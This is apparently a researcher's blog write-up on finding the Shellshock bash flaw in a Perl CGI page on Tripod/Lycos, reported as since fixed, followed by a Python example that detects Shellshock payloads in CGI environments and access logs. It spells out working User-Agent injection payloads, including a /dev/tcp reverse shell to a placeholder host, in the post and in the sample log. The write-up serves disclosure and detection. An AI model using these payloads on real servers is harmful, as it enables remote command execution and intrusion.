My ShellShockings

While I was surfing the interwebs my eyes caught a Perl script which prints out the environment variables. For example, something like this.
[code language="perl"]
#!/usr/bin/perl
use strict;
use warnings;
use CGI;

my $cgi = CGI->new;

# Collect every submitted parameter (GET or POST).
my %input;
for my $key ( $cgi->param() ) {
    $input{$key} = $cgi->param($key);
}

# The blank line after Content-type terminates the CGI response headers.
print qq{Content-type: text/html

<html><head></head><body>
};

# Dump the whole CGI environment. Every request header arrives here as an
# HTTP_* variable (User-Agent becomes HTTP_USER_AGENT), and nothing is
# HTML-escaped, so this page reflects client-controlled input verbatim.
foreach my $key (sort keys %ENV) {
    print $key, ' = ', $ENV{$key}, "<br>\n";
}

for my $key ( keys %input ) {
    print $key, ' = ', $input{$key}, "<br>\n";
}

print qq{<form METHOD=POST><input type="submit" value="Post Request">
<input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get Request ">
<input name="getfield" ></form>};

print qq{</body></html>};
[/code]
This would output the following.
[code language="text"]
CONTEXT_DOCUMENT_ROOT : /var/chroot/home/
DOCUMENT_ROOT : /var/chroot/home/
GATEWAY_INTERFACE : CGI/1.1
GD_PHP_HANDLER : x-httpd-php5-3
HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_ENCODING : gzip, deflate, sdch
HTTP_ACCEPT_LANGUAGE : en-US,en;q=0.8
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
PATH : /usr/local/bin:/usr/bin:/bin
[/code]
The web server copies the client's "User-Agent:" header straight into the HTTP_USER_AGENT environment variable (every request header becomes an HTTP_* variable like this), and we control that header completely. Any bash the CGI script spawns, or a CGI that is itself a bash script, inherits those variables, and a bash affected by Shellshock (CVE-2014-6271) treats a variable whose value begins with "() {" as an exported function definition and executes whatever commands follow the closing brace. So yes, it was vulnerable to the bash Shellshock vulnerability. For example, let's inject "uname -a" and see the output. The "echo;" in the payload emits the empty line that ends the CGI response headers, so the command's output lands in the body of the page instead of triggering a server error.
[code language="text"]
GET xxxx HTTP/1.1
Host: perlcgial.tripod.com
User-Agent: () { :;}; echo; /bin/bash -c "uname -a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[/code]

Let's try () { :;}; echo; /bin/bash -c "/sbin/ifconfig"

Since we are injecting arbitrary commands into bash, we can also get a reverse shell, with a listener waiting on port 4444 of 1.1.1.1 (the address here is a placeholder), like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/1.1.1.1/4444 0>&1
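
To make the mechanism concrete, here is an added Python example; it is not code from the original post and not anything the Tripod or Lycos servers ran. It rebuilds the CGI environment a gateway such as Apache's mod_cgi derives from a request (showing how User-Agent becomes HTTP_USER_AGENT while Content-Type stays unprefixed, per RFC 3875), flags any variable whose value carries the "() {" function-definition prefix that a vulnerable bash would parse, and then runs the same check over a few Apache combined-format access log lines, since the User-Agent and Referer are recorded there. The request, host names, addresses, script path and log lines are all constructed for the example.

```python
"""Shellshock: how a request header reaches bash, and how to spot it in logs.

Added example, not code from the original post. The request and log lines
below are constructed, not captured traffic.
"""
import re
from typing import Dict, List, Tuple

# A bash without the CVE-2014-6271 fixes treated an environment variable whose
# value starts with "() {" as an exported function definition and kept parsing
# past the closing brace, executing whatever followed. For detection we search
# for that prefix anywhere in the value, with optional whitespace, which is
# deliberately broader than bash's own "starts with" check.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# RFC 3875 maps these two headers to meta-variables without the HTTP_ prefix.
_UNPREFIXED = {"content-type": "CONTENT_TYPE", "content-length": "CONTENT_LENGTH"}

# Constructed request in the shape of the one in the post (path is hypothetical).
SAMPLE_REQUEST = (
    "GET /cgi-bin/printenv.pl?x=1 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    'User-Agent: () { :;}; echo; /bin/bash -c "uname -a"\r\n'
    "Accept: text/html\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
)

# Constructed Apache "combined" log lines: one benign, one with the payload in
# the User-Agent, one with a reverse-shell payload in the Referer. Apache
# writes a literal quote inside a quoted field as \".
SAMPLE_LOG = [
    r'203.0.113.7 - - [29/Sep/2014:10:15:31 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) Chrome/39.0"',
    r'203.0.113.9 - - [29/Sep/2014:10:15:32 +0000] "GET /cgi-bin/printenv.pl HTTP/1.1" 200 512 "-" "() { :;}; echo; /bin/bash -c \"uname -a\""',
    r'198.51.100.4 - - [29/Sep/2014:10:15:40 +0000] "GET /cgi-bin/printenv.pl HTTP/1.1" 200 512 "() { :;}; /bin/bash -i >& /dev/tcp/192.0.2.1/4444 0>&1" "curl/7.38.0"',
]


def cgi_environ(raw_request: str) -> Dict[str, str]:
    """Model the environment a CGI gateway hands to the script.

    Only the request line and the header -> HTTP_* mapping (uppercase,
    '-' becomes '_') are modelled; server-side variables such as
    DOCUMENT_ROOT are left out.
    """
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, protocol = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    env = {
        "GATEWAY_INTERFACE": "CGI/1.1",
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
        "SERVER_PROTOCOL": protocol,
    }
    for line in header_lines:
        name, _, value = line.partition(":")
        key = name.strip().lower()
        env[_UNPREFIXED.get(key, "HTTP_" + key.upper().replace("-", "_"))] = value.strip()
    return env


def find_shellshock(env: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (variable, value) pairs a vulnerable bash would parse as functions."""
    return [(k, v) for k, v in env.items() if SHELLSHOCK_RE.search(v)]


# Apache combined format; quoted fields may contain backslash-escaped quotes.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"$'
)


def _unescape(field: str) -> str:
    return field.replace('\\"', '"')


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, field, payload) for every line carrying the prefix."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these
        for field in ("request", "referer", "user_agent"):
            value = _unescape(m.group(field))
            if SHELLSHOCK_RE.search(value):
                hits.append((m.group("ip"), field, value))
    return hits


if __name__ == "__main__":
    for var, val in find_shellshock(cgi_environ(SAMPLE_REQUEST)):
        print(f"env {var} = {val!r}")
    for ip, field, payload in scan_access_log(SAMPLE_LOG):
        print(f"log {ip} {field}: {payload!r}")
```

The log scan only sees headers the server chose to log; a payload placed in a header such as Cookie or a custom X-* header still reaches the environment but never appears in a combined-format log, so header-level inspection at a proxy or WAF is the more complete control.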

That is it, game over 🙂 This is how I owned Lycos and Tripod. As soon as I found this I reported it to them, and they have already fixed it.
By the way, koding.com was also affected by the Shellshock vulnerability.

After I reported it, it was successfully patched too.
Bonus: Tripod had a reflected XSS vulnerability too.

I don’t know why it gives such a search result 😉
